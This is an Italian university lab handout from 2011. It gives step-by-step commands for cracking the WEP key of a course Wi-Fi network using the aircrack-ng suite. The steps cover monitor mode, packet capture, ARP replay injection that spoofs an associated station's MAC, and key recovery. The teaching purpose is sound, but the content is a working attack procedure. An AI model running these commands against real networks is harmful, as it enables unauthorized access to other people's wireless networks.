Allegato "appunti_esercitazione_20_4_2011.txt"
Scarica 1 #di seguito sono elencati i passi necessari per fare il cracking di una rete wifi
2 #protetta con chiave WEP sfruttando la suite di tools aircrack, ed in particolare:
3 #airodump: per la cattura di pacchetti 802.11 (sniffer)
4 #aireplay: per il packet injection
5 #aircrack: per il cracking di chiavi WEP
6
7
8 #diventare amministratore
9 sudo su
10
11 #disabilitare il network-manager
12 /etc/init.d/network-manager stop
13
14 #creare una interfaccia di rete virtuale (associata alla scheda wireless) preimpostata
15 #in modalità monitor. Potrebbe essere necessario dover disabilitare la scheda di
16 #rete ad andare in modalità monitor
17 iw dev wlan0 interface add wlan0mon type monitor
18
19 #per entrare in modalità monitor su una qualsiasi interfaccia:
20 (ifconfig nomewlan0 down; iwconfig nomewlan0 mode monitor)
21
22 #vedere quali solo le reti WEP vicine e il canale corrispondente
23 airodump-ng wlan0mon
24
25 #nel nostro caso, DIMAT-WEP lavora sul canale 2, perciò...
26 airodump-ng -c 2 -w file_cattura wlan0mon
27
28 #in un altro terminale eseguire il seguente comando per ripetere il
29 #sotto-comando ogni 2 secondi
30 #(serve per verificare se il file file_cattura.cap cresce)
31 watch ls -l
32
33 #eseguire il comando aircrack-ng
34 #aircrack chiede di scegliere interattivamente un BSSID, scegliamo quello WEP
35 #corrispondente a DIMAT-WEP e
36 #lasciamo che aircrack analizzi i dati crittografati alla ricerca della chiave
37 aircrack-ng cattura.cap
38
39 #molto probabilmente aircrack ci chiederà di provare con un numero maggiore di IV..
40 #Per accellerare questo processo possiamo stimolare l'invio di dati.
41 #Come? Ad esempio, possiamo intercettare un frame e provare a ritrasmetterlo così com è:
42 # se è un ping arriverebbe la reply e potrei ritrasmetterla
43 #molte volte, analogamente se si tratta di pacchetti ARP.
44 #Notare che le repliche arriveranno sempre con IV diversi!
45 #Volendo sfruttare i pacchetti ARP l'idea è: individuare i frame ARP destinati all'indirizzo broadcast..
46 #Perciò, in un altro terminale proviamo ad eseguire il comando
47 #aireplay-ng che consente di ripetere varie tipologie di frame intercettati
48 #(l'opzione -3 ad esempio identifica i pacchetti ARP, l'opzione -b serve per definire il BSSID su cui
49 #si vuole lavorare -si vede dalla schermata di airodump-)
50 aireplay-ng -3 wlan0mon -b INDIRIZZO_MAC_BSSID
51
52 #A questo punto bisogna individuare un indirizzo MAC di una stazione che
53 #è già associata, se noi non lo siamo.
54 #Ci servirà come indirizzo MAC per le repliche false di ARP da inviare.
55 #Possiamo utilizzare wireshark per trovare un indirizzo valido o individuarlo nella seconda
56 #parte della schermata di airodump
57 aireplay-ng -3 wlan0mon -b INDIRIZZO_MAC_BSSID -h MAC_SORGENTE_DA_USARE_PER_REPLICHE
58
59 #Ora, disponendo di molti più IV su cui fare incroci e lavorare, nella
60 #schermata di aircrak dovrebbe in poco tempo apparire la chiave
Allegati
Non è consentito inserire allegati su questa pagina.